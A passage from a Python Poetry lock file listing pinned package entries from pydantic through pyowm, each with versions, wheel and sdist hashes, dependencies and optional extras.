{file = "pydantic-1.10.13-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:968ac42970f57b8344ee08837b62f6ee6f53c33f603547a55571c954a4225691"},
{file = "pydantic-1.10.13-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9849f031cf8a2f0a928fe885e5a04b08006d6d41876b8bbd2fc68a18f9f2e3fd"},
{file = "pydantic-1.10.13-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:56e3ff861c3b9c6857579de282ce8baabf443f42ffba355bf070770ed63e11e1"},
{file = "pydantic-1.10.13-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f00790179497767aae6bcdc36355792c79e7bbb20b145ff449700eb076c5f96"},
{file = "pydantic-1.10.13-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:75b297827b59bc229cac1a23a2f7a4ac0031068e5be0ce385be1462e7e17a35d"},
{file = "pydantic-1.10.13-cp39-cp39-win_amd64.whl", hash = "sha256:e70ca129d2053fb8b728ee7d1af8e553a928d7e301a311094b8a0501adc8763d"},
{file = "pydantic-1.10.13-py3-none-any.whl", hash = "sha256:b87326822e71bd5f313e7d3bfdc77ac3247035ac10b0c0618bd99dcf95b1e687"},
{file = "pydantic-1.10.13.tar.gz", hash = "sha256:32c8b48dcd3b2ac4e78b0ba4af3a2c2eb6048cb75202f0ea7b34feb740efc340"},
]
[package.dependencies]
typing-extensions = ">=4.2.0"
[package.extras]
dotenv = ["python-dotenv (>=0.10.4)"]
email = ["email-validator (>=1.0.3)"]
[[package]]
name = "pydeck"
version = "0.8.0"
description = "Widget for deck.gl maps"
optional = true
python-versions = ">=3.7"
files = [
{file = "pydeck-0.8.0-py2.py3-none-any.whl", hash = "sha256:a8fa7757c6f24bba033af39db3147cb020eef44012ba7e60d954de187f9ed4d5"},
{file = "pydeck-0.8.0.tar.gz", hash = "sha256:07edde833f7cfcef6749124351195aa7dcd24663d4909fd7898dbd0b6fbc01ec"},
]
[package.dependencies]
jinja2 = ">=2.10.1"
numpy = ">=1.16.4"
[package.extras]
carto = ["pydeck-carto"]
jupyter = ["ipykernel (>=5.1.2)", "ipython (>=5.8.0)", "ipywidgets (>=7,<8)", "traitlets (>=4.3.2)"]
[[package]]
name = "pyee"
version = "11.0.1"
description = "A rough port of Node.js's EventEmitter to Python with a few tricks of its own"
optional = false
python-versions = ">=3.8"
files = [
{file = "pyee-11.0.1-py3-none-any.whl", hash = "sha256:9bcc9647822234f42c228d88de63d0f9ffa881e87a87f9d36ddf5211f6ac977d"},
{file = "pyee-11.0.1.tar.gz", hash = "sha256:a642c51e3885a33ead087286e35212783a4e9b8d6514a10a5db4e57ac57b2b29"},
]
[package.dependencies]
typing-extensions = "*"
[package.extras]
dev = ["black", "flake8", "flake8-black", "isort", "jupyter-console", "mkdocs", "mkdocs-include-markdown-plugin", "mkdocstrings[python]", "pytest", "pytest-asyncio", "pytest-trio", "toml", "tox", "trio", "trio", "trio-typing", "twine", "twisted", "validate-pyproject[all]"]
[[package]]
name = "pygments"
version = "2.16.1"
description = "Pygments is a syntax highlighting package written in Python."
optional = false
python-versions = ">=3.7"
files = [
{file = "Pygments-2.16.1-py3-none-any.whl", hash = "sha256:13fc09fa63bc8d8671a6d247e1eb303c4b343eaee81d861f3404db2935653692"},
{file = "Pygments-2.16.1.tar.gz", hash = "sha256:1daff0494820c69bc8941e407aa20f577374ee88364ee10a98fdbe0aece96e29"},
]
[package.extras]
plugins = ["importlib-metadata"]
[[package]]
name = "pyjwt"
version = "2.8.0"
description = "JSON Web Token implementation in Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "PyJWT-2.8.0-py3-none-any.whl", hash = "sha256:59127c392cc44c2da5bb3192169a91f429924e17aff6534d70fdc02ab3e04320"},
{file = "PyJWT-2.8.0.tar.gz", hash = "sha256:57e28d156e3d5c10088e0c68abb90bfac3df82b40a71bd0daa20c65ccd5c23de"},
]
[package.dependencies]
cryptography = {version = ">=3.4.0", optional = true, markers = "extra == \"crypto\""}
[package.extras]
crypto = ["cryptography (>=3.4.0)"]
dev = ["coverage[toml] (==5.0.4)", "cryptography (>=3.4.0)", "pre-commit", "pytest (>=6.0.0,<7.0.0)", "sphinx (>=4.5.0,<5.0.0)", "sphinx-rtd-theme", "zope.interface"]
docs = ["sphinx (>=4.5.0,<5.0.0)", "sphinx-rtd-theme", "zope.interface"]
tests = ["coverage[toml] (==5.0.4)", "pytest (>=6.0.0,<7.0.0)"]
[[package]]
name = "pylance"
version = "0.5.10"
description = "python wrapper for lance-rs"
optional = true
python-versions = ">=3.8"
files = [
{file = "pylance-0.5.10-cp38-abi3-macosx_10_15_x86_64.whl", hash = "sha256:ca5b649fe3adfacaec7680c708fc3a952f6d8b43fd193afdfc5f3e8e13c47b82"},
{file = "pylance-0.5.10-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:a5b47ca4cf91709f0f7cd9f9604c6c9c6efc031f38035c27a7d0a21d9b83f507"},
{file = "pylance-0.5.10-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9ffa28a110345a6ce191285171b70a13696aa92cb4c1d6318d5444df65ab8025"},
{file = "pylance-0.5.10-cp38-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d0244faa5b039d6bb0e00d8f27222542c0e86bbf9128b6d8db9e5072ec0ea19"},
{file = "pylance-0.5.10-cp38-abi3-win_amd64.whl", hash = "sha256:92727d6a8f383f16a8e5503d41e2212881fe829b493f6f6aec202c2c7dce7d65"},
]
[package.dependencies]
numpy = ">=1.22"
pyarrow = ">=10"
[package.extras]
tests = ["duckdb", "ml_dtypes", "pandas (>=1.4)", "polars[pandas,pyarrow]", "pytest", "tensorflow"]
[[package]]
name = "pymongo"
version = "4.5.0"
description = "Python driver for MongoDB <http://www.mongodb.org>"
optional = true
python-versions = ">=3.7"
files = [
{file = "pymongo-4.5.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:2d4fa1b01fa7e5b7bb8d312e3542e211b320eb7a4e3d8dc884327039d93cb9e0"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux1_i686.whl", hash = "sha256:dfcd2b9f510411de615ccedd47462dae80e82fdc09fe9ab0f0f32f11cf57eeb5"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:3e33064f1984db412b34d51496f4ea785a9cff621c67de58e09fb28da6468a52"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux2014_i686.whl", hash = "sha256:33faa786cc907de63f745f587e9879429b46033d7d97a7b84b37f4f8f47b9b32"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux2014_ppc64le.whl", hash = "sha256:76a262c41c1a7cbb84a3b11976578a7eb8e788c4b7bfbd15c005fb6ca88e6e50"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux2014_s390x.whl", hash = "sha256:0f4b125b46fe377984fbaecf2af40ed48b05a4b7676a2ff98999f2016d66b3ec"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:40d5f6e853ece9bfc01e9129b228df446f49316a4252bb1fbfae5c3c9dedebad"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:152259f0f1a60f560323aacf463a3642a65a25557683f49cfa08c8f1ecb2395a"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6d64878d1659d2a5bdfd0f0a4d79bafe68653c573681495e424ab40d7b6d6d41"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1bb3a62395ffe835dbef3a1cbff48fbcce709c78bd1f52e896aee990928432b"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fe48f50fb6348511a3268a893bfd4ab5f263f5ac220782449d03cd05964d1ae7"},
{file = "pymongo-4.5.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7591a3beea6a9a4fa3080d27d193b41f631130e3ffa76b88c9ccea123f26dc59"},
{file = "pymongo-4.5.0-cp310-cp310-win32.whl", hash = "sha256:3a7166d57dc74d679caa7743b8ecf7dc3a1235a9fd178654dddb2b2a627ae229"},
{file = "pymongo-4.5.0-cp310-cp310-win_amd64.whl", hash = "sha256:21b953da14549ff62ea4ae20889c71564328958cbdf880c64a92a48dda4c9c53"},
{file = "pymongo-4.5.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ead4f19d0257a756b21ac2e0e85a37a7245ddec36d3b6008d5bfe416525967dc"},
{file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9aff6279e405dc953eeb540ab061e72c03cf38119613fce183a8e94f31be608f"},
{file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:cd4c8d6aa91d3e35016847cbe8d73106e3d1c9a4e6578d38e2c346bfe8edb3ca"},
{file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:08819da7864f9b8d4a95729b2bea5fffed08b63d3b9c15b4fea47de655766cf5"},
{file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a253b765b7cbc4209f1d8ee16c7287c4268d3243070bf72d7eec5aa9dfe2a2c2"},
{file = "pymongo-4.5.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8027c9063579083746147cf401a7072a9fb6829678076cd3deff28bb0e0f50c8"},
{file = "pymongo-4.5.0-cp311-cp311-win32.whl", hash = "sha256:9d2346b00af524757576cc2406414562cced1d4349c92166a0ee377a2a483a80"},
{file = "pymongo-4.5.0-cp311-cp311-win_amd64.whl", hash = "sha256:c3c3525ea8658ee1192cdddf5faf99b07ebe1eeaa61bf32821126df6d1b8072b"},
{file = "pymongo-4.5.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:e5a27f348909235a106a3903fc8e70f573d89b41d723a500869c6569a391cff7"},
{file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9a9a39b7cac81dca79fca8c2a6479ef4c7b1aab95fad7544cc0e8fd943595a2"},
{file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:496c9cbcb4951183d4503a9d7d2c1e3694aab1304262f831d5e1917e60386036"},
{file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:23cc6d7eb009c688d70da186b8f362d61d5dd1a2c14a45b890bd1e91e9c451f2"},
{file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fff7d17d30b2cd45afd654b3fc117755c5d84506ed25fda386494e4e0a3416e1"},
{file = "pymongo-4.5.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6422b6763b016f2ef2beedded0e546d6aa6ba87910f9244d86e0ac7690f75c96"},
{file = "pymongo-4.5.0-cp312-cp312-win32.whl", hash = "sha256:77cfff95c1fafd09e940b3fdcb7b65f11442662fad611d0e69b4dd5d17a81c60"},
{file = "pymongo-4.5.0-cp312-cp312-win_amd64.whl", hash = "sha256:e57d859b972c75ee44ea2ef4758f12821243e99de814030f69a3decb2aa86807"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:2b0176f9233a5927084c79ff80b51bd70bfd57e4f3d564f50f80238e797f0c8a"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:89b3f2da57a27913d15d2a07d58482f33d0a5b28abd20b8e643ab4d625e36257"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:5caee7bd08c3d36ec54617832b44985bd70c4cbd77c5b313de6f7fce0bb34f93"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_i686.whl", hash = "sha256:1d40ad09d9f5e719bc6f729cc6b17f31c0b055029719406bd31dde2f72fca7e7"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_ppc64le.whl", hash = "sha256:076afa0a4a96ca9f77fec0e4a0d241200b3b3a1766f8d7be9a905ecf59a7416b"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_s390x.whl", hash = "sha256:3fa3648e4f1e63ddfe53563ee111079ea3ab35c3b09cd25bc22dadc8269a495f"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:44ee985194c426ddf781fa784f31ffa29cb59657b2dba09250a4245431847d73"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b33c17d9e694b66d7e96977e9e56df19d662031483efe121a24772a44ccbbc7e"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3d79ae3bb1ff041c0db56f138c88ce1dfb0209f3546d8d6e7c3f74944ecd2439"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d67225f05f6ea27c8dc57f3fa6397c96d09c42af69d46629f71e82e66d33fa4f"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:41771b22dd2822540f79a877c391283d4e6368125999a5ec8beee1ce566f3f82"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a1f26bc1f5ce774d99725773901820dfdfd24e875028da4a0252a5b48dcab5c"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3236cf89d69679eaeb9119c840f5c7eb388a2110b57af6bb6baf01a1da387c18"},
{file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:e1f61355c821e870fb4c17cdb318669cfbcf245a291ce5053b41140870c3e5cc"},
{file = "pymongo-4.5.0-cp37-cp37m-win32.whl", hash = "sha256:49dce6957598975d8b8d506329d2a3a6c4aee911fa4bbcf5e52ffc6897122950"},
{file = "pymongo-4.5.0-cp37-cp37m-win_amd64.whl", hash = "sha256:f2227a08b091bd41df5aadee0a5037673f691e2aa000e1968b1ea2342afc6880"},
{file = "pymongo-4.5.0-cp38-cp38-macosx_11_0_universal2.whl", hash = "sha256:435228d3c16a375274ac8ab9c4f9aef40c5e57ddb8296e20ecec9e2461da1017"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux1_i686.whl", hash = "sha256:8e559116e4128630ad3b7e788e2e5da81cbc2344dee246af44471fa650486a70"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:840eaf30ccac122df260b6005f9dfae4ac287c498ee91e3e90c56781614ca238"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:b4fe46b58010115514b842c669a0ed9b6a342017b15905653a5b1724ab80917f"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux2014_i686.whl", hash = "sha256:a8127437ebc196a6f5e8fddd746bd0903a400dc6b5ae35df672dd1ccc7170a2a"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux2014_ppc64le.whl", hash = "sha256:2988ef5e6b360b3ff1c6d55c53515499de5f48df31afd9f785d788cdacfbe2d3"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux2014_s390x.whl", hash = "sha256:e249190b018d63c901678053b4a43e797ca78b93fb6d17633e3567d4b3ec6107"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:1240edc1a448d4ada4bf1a0e55550b6292420915292408e59159fd8bbdaf8f63"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b6d2a56fc2354bb6378f3634402eec788a8f3facf0b3e7d468db5f2b5a78d763"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2a0aade2b11dc0c326ccd429ee4134d2d47459ff68d449c6d7e01e74651bd255"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:74c0da07c04d0781490b2915e7514b1adb265ef22af039a947988c331ee7455b"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f3754acbd7efc7f1b529039fcffc092a15e1cf045e31f22f6c9c5950c613ec4d"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:631492573a1bef2f74f9ac0f9d84e0ce422c251644cd81207530af4aa2ee1980"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:e2654d1278384cff75952682d17c718ecc1ad1d6227bb0068fd826ba47d426a5"},
{file = "pymongo-4.5.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:168172ef7856e20ec024fe2a746bfa895c88b32720138e6438fd765ebd2b62dd"},
{file = "pymongo-4.5.0-cp38-cp38-win32.whl", hash = "sha256:b25f7bea162b3dbec6d33c522097ef81df7c19a9300722fa6853f5b495aecb77"},
{file = "pymongo-4.5.0-cp38-cp38-win_amd64.whl", hash = "sha256:b520aafc6cb148bac09ccf532f52cbd31d83acf4d3e5070d84efe3c019a1adbf"},
{file = "pymongo-4.5.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8543253adfaa0b802bfa88386db1009c6ebb7d5684d093ee4edc725007553d21"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux1_i686.whl", hash = "sha256:bc5d8c3647b8ae28e4312f1492b8f29deebd31479cd3abaa989090fb1d66db83"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:505f8519c4c782a61d94a17b0da50be639ec462128fbd10ab0a34889218fdee3"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:53f2dda54d76a98b43a410498bd12f6034b2a14b6844ca08513733b2b20b7ad8"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux2014_i686.whl", hash = "sha256:9c04b9560872fa9a91251030c488e0a73bce9321a70f991f830c72b3f8115d0d"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux2014_ppc64le.whl", hash = "sha256:58a63a26a1e3dc481dd3a18d6d9f8bd1d576cd1ffe0d479ba7dd38b0aeb20066"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux2014_s390x.whl", hash = "sha256:f076b779aa3dc179aa3ed861be063a313ed4e48ae9f6a8370a9b1295d4502111"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:1b1d7d9aabd8629a31d63cd106d56cca0e6420f38e50563278b520f385c0d86e"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:37df8f6006286a5896d1cbc3efb8471ced42e3568d38e6cb00857277047b0d63"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:56320c401f544d762fc35766936178fbceb1d9261cd7b24fbfbc8fb6f67aa8a5"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:bbd705d5f3c3d1ff2d169e418bb789ff07ab3c70d567cc6ba6b72b04b9143481"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80a167081c75cf66b32f30e2f1eaee9365af935a86dbd76788169911bed9b5d5"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c42748ccc451dfcd9cef6c5447a7ab727351fd9747ad431db5ebb18a9b78a4d"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:cf62da7a4cdec9a4b2981fcbd5e08053edffccf20e845c0b6ec1e77eb7fab61d"},
{file = "pymongo-4.5.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:b5bbb87fa0511bd313d9a2c90294c88db837667c2bda2ea3fa7a35b59fd93b1f"},
{file = "pymongo-4.5.0-cp39-cp39-win32.whl", hash = "sha256:465fd5b040206f8bce7016b01d7e7f79d2fcd7c2b8e41791be9632a9df1b4999"},
{file = "pymongo-4.5.0-cp39-cp39-win_amd64.whl", hash = "sha256:63d8019eee119df308a075b8a7bdb06d4720bf791e2b73d5ab0e7473c115d79c"},
{file = "pymongo-4.5.0.tar.gz", hash = "sha256:681f252e43b3ef054ca9161635f81b730f4d8cadd28b3f2b2004f5a72f853982"},
]
[package.dependencies]
dnspython = ">=1.16.0,<3.0.0"
[package.extras]
aws = ["pymongo-auth-aws (<2.0.0)"]
encryption = ["certifi", "pymongo[aws]", "pymongocrypt (>=1.6.0,<2.0.0)"]
gssapi = ["pykerberos", "winkerberos (>=0.5.0)"]
ocsp = ["certifi", "cryptography (>=2.5)", "pyopenssl (>=17.2.0)", "requests (<3.0.0)", "service-identity (>=18.1.0)"]
snappy = ["python-snappy"]
zstd = ["zstandard"]
[[package]]
name = "pympler"
version = "1.0.1"
description = "A development tool to measure, monitor and analyze the memory behavior of Python objects."
optional = true
python-versions = ">=3.6"
files = [
{file = "Pympler-1.0.1-py3-none-any.whl", hash = "sha256:d260dda9ae781e1eab6ea15bacb84015849833ba5555f141d2d9b7b7473b307d"},
{file = "Pympler-1.0.1.tar.gz", hash = "sha256:993f1a3599ca3f4fcd7160c7545ad06310c9e12f70174ae7ae8d4e25f6c5d3fa"},
]
[[package]]
name = "pymupdf"
version = "1.23.5"
description = "A high performance Python library for data extraction, analysis, conversion & manipulation of PDF (and other) documents."
optional = true
python-versions = ">=3.8"
files = [
{file = "PyMuPDF-1.23.5-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:c71b5e80a08272b9f3012314dc47ee2423270b30262d07ec7dd9709ae2bde1ac"},
{file = "PyMuPDF-1.23.5-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:4b1bd9a91dee18bc95d7af2c593a214857a03e4fcd9a1eb01588df432de24c58"},
{file = "PyMuPDF-1.23.5-cp310-none-manylinux2014_aarch64.whl", hash = "sha256:eafa1bce0860320ddbb7edb4ab5678e02051db5450251ba8e918713d9a70c03c"},
{file = "PyMuPDF-1.23.5-cp310-none-manylinux2014_x86_64.whl", hash = "sha256:29e1d82b16f7580280ae35a0ae78de55f15c92ec87b7f3a1372f40f37a053bf3"},
{file = "PyMuPDF-1.23.5-cp310-none-win32.whl", hash = "sha256:d3bef175707693a2f53fe0fe4e546e3187c7876aedabfe43d9a916060bac9073"},
{file = "PyMuPDF-1.23.5-cp310-none-win_amd64.whl", hash = "sha256:da1b08b5348152f2940fa183d0265a6b6eb6f0292fae44b576eaf8e53723e336"},
{file = "PyMuPDF-1.23.5-cp311-none-macosx_10_9_x86_64.whl", hash = "sha256:59755a600c25a282589b548ffa045aed59c2df7b76943978cabb1825f0c03ec4"},
{file = "PyMuPDF-1.23.5-cp311-none-macosx_11_0_arm64.whl", hash = "sha256:264d5f6478d787c336520cf1a99e39bb6a0ef6d984550f925095c0e692dea7b5"},
{file = "PyMuPDF-1.23.5-cp311-none-manylinux2014_aarch64.whl", hash = "sha256:3f5fc705e8790217d23ab5e7ac2c05d82e050f6271b710300288adfe87a71072"},
{file = "PyMuPDF-1.23.5-cp311-none-manylinux2014_x86_64.whl", hash = "sha256:ee9e9ce1897eeac0fc33cf99084067c14250312a5dbc1372012c3d2f0e7a4af5"},
{file = "PyMuPDF-1.23.5-cp311-none-win32.whl", hash = "sha256:d2e9cfa46193fab196c27cb07561e1bb0938450984c2f01b3739f254a31b639e"},
{file = "PyMuPDF-1.23.5-cp311-none-win_amd64.whl", hash = "sha256:31405311c28fc8b3b2975a98b60bac388563748beaacb6da470f917678417e2d"},
{file = "PyMuPDF-1.23.5-cp312-none-macosx_10_9_x86_64.whl", hash = "sha256:64ab1097e3a077ae9db6a98d01e2e77087894ebd85b702edf5eb85d05ab8c0f1"},
{file = "PyMuPDF-1.23.5-cp312-none-macosx_11_0_arm64.whl", hash = "sha256:f7a8f91681b88ad216c36911e08ea25d2b3121350d52f4f8d76aeb0b7fcc6bef"},
{file = "PyMuPDF-1.23.5-cp312-none-manylinux2014_aarch64.whl", hash = "sha256:bb345ef1120db4f78ec0f229514d333ea3e7d367875c1400423a9b3e2b48ffc0"},
{file = "PyMuPDF-1.23.5-cp312-none-manylinux2014_x86_64.whl", hash = "sha256:9bde3683e254661e6b0032006f0ef7025ade2a33d3e3045499e71b76ea99942c"},
{file = "PyMuPDF-1.23.5-cp312-none-win32.whl", hash = "sha256:3a01c93c69e74068c1618631a750677fd088708d2b09b3c23809b099fa4ffa39"},
{file = "PyMuPDF-1.23.5-cp312-none-win_amd64.whl", hash = "sha256:693979ad4c8885729ac126b3202f1cb645f3392ad7e0964c2d924e61bc0e0a9d"},
{file = "PyMuPDF-1.23.5-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:9586bc98a322e546cf2e477309806aa4a3e1d18efc9b93fc2e2b3d8131e1b9f7"},
{file = "PyMuPDF-1.23.5-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:faebdf8679706964f87617ee43b8d0107587d20b526892b538222146a4c32d43"},
{file = "PyMuPDF-1.23.5-cp38-none-manylinux2014_aarch64.whl", hash = "sha256:3400b582be3d71f1c0974701fcfda32f0c2ebb75a78c2aea430552b0c6896546"},
{file = "PyMuPDF-1.23.5-cp38-none-manylinux2014_x86_64.whl", hash = "sha256:fab599d23fa490725e5b5a70bfb6bc87acf5ceb70abe11ad2ef2b2f516961f31"},
{file = "PyMuPDF-1.23.5-cp38-none-win32.whl", hash = "sha256:53278c6a3d0a5dc8f221e0a77c065a61fd0598f9d8d9ef5be53de0c0a7d2df90"},
{file = "PyMuPDF-1.23.5-cp38-none-win_amd64.whl", hash = "sha256:dbce86df507f6bce118b12b33d893f1d3512013c898174211e903da78e1916aa"},
{file = "PyMuPDF-1.23.5-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:b234805b615b2d45dcb1bfe5c2167dc4121e31d618ab557856a3153b94c1676b"},
{file = "PyMuPDF-1.23.5-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:4a53b2bf19be687160e4d18c27680e5326687aa39a7e31641d32a61edadbbfd9"},
{file = "PyMuPDF-1.23.5-cp39-none-manylinux2014_aarch64.whl", hash = "sha256:705a7aed0a917c35bb5efa4d94a7e8092705b3395726f9770d2b888de775f437"},
{file = "PyMuPDF-1.23.5-cp39-none-manylinux2014_x86_64.whl", hash = "sha256:332c1d5633c233458c4b65e6ad4a860391c507384bd2324a186b2702f8c64dfe"},
{file = "PyMuPDF-1.23.5-cp39-none-win32.whl", hash = "sha256:435a108cf8b53302500b52adb2cccbf2afa51c94ab3c705b250245090b46f5da"},
{file = "PyMuPDF-1.23.5-cp39-none-win_amd64.whl", hash = "sha256:460b47a1a17335d444ec441b68c083da5e51cdfcfa67a6638de69fe5e97f4ad2"},
{file = "PyMuPDF-1.23.5.tar.gz", hash = "sha256:4508ee04c46cac8356a9d04f0d9a63f845770d2abb54caf512b44d22f0e80300"},
]
[package.dependencies]
PyMuPDFb = "1.23.5"
[[package]]
name = "pymupdfb"
version = "1.23.5"
description = "MuPDF shared libraries for PyMuPDF."
optional = true
python-versions = ">=3.8"
files = [
{file = "PyMuPDFb-1.23.5-py3-none-macosx_10_9_x86_64.whl", hash = "sha256:d0095f28b2bcd64ed8a9636dfba193108eeb6c24d0ec71fa3f88cb15aee67a30"},
{file = "PyMuPDFb-1.23.5-py3-none-macosx_11_0_arm64.whl", hash = "sha256:80137c37a4b0d5abeb988434c7d7eb3f9087afdd0754f4bf2f8840a788e691ae"},
{file = "PyMuPDFb-1.23.5-py3-none-manylinux2014_aarch64.manylinux_2_17_aarch64.whl", hash = "sha256:e26705e1a4ea42926b70c5655f2509d555a4774d1d1382ecc7e76466695209e6"},
{file = "PyMuPDFb-1.23.5-py3-none-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:2b71b5b7987f2ebe9f6893544151ede2de74ec30651eef584039eb5f9c7c02aa"},
{file = "PyMuPDFb-1.23.5-py3-none-win32.whl", hash = "sha256:f269814bafdffd5558d44af3de63eaa531d498de640a79cf6c7072011fd4088f"},
{file = "PyMuPDFb-1.23.5-py3-none-win_amd64.whl", hash = "sha256:85cbc308085a4ec794e0da790965985cc5ccb21b2abc09732e072f6eaf10150b"},
]
[[package]]
name = "pyowm"
version = "3.3.0"
description = "A Python wrapper around OpenWeatherMap web APIs"
optional = true
python-versions = ">=3.7"
files = [
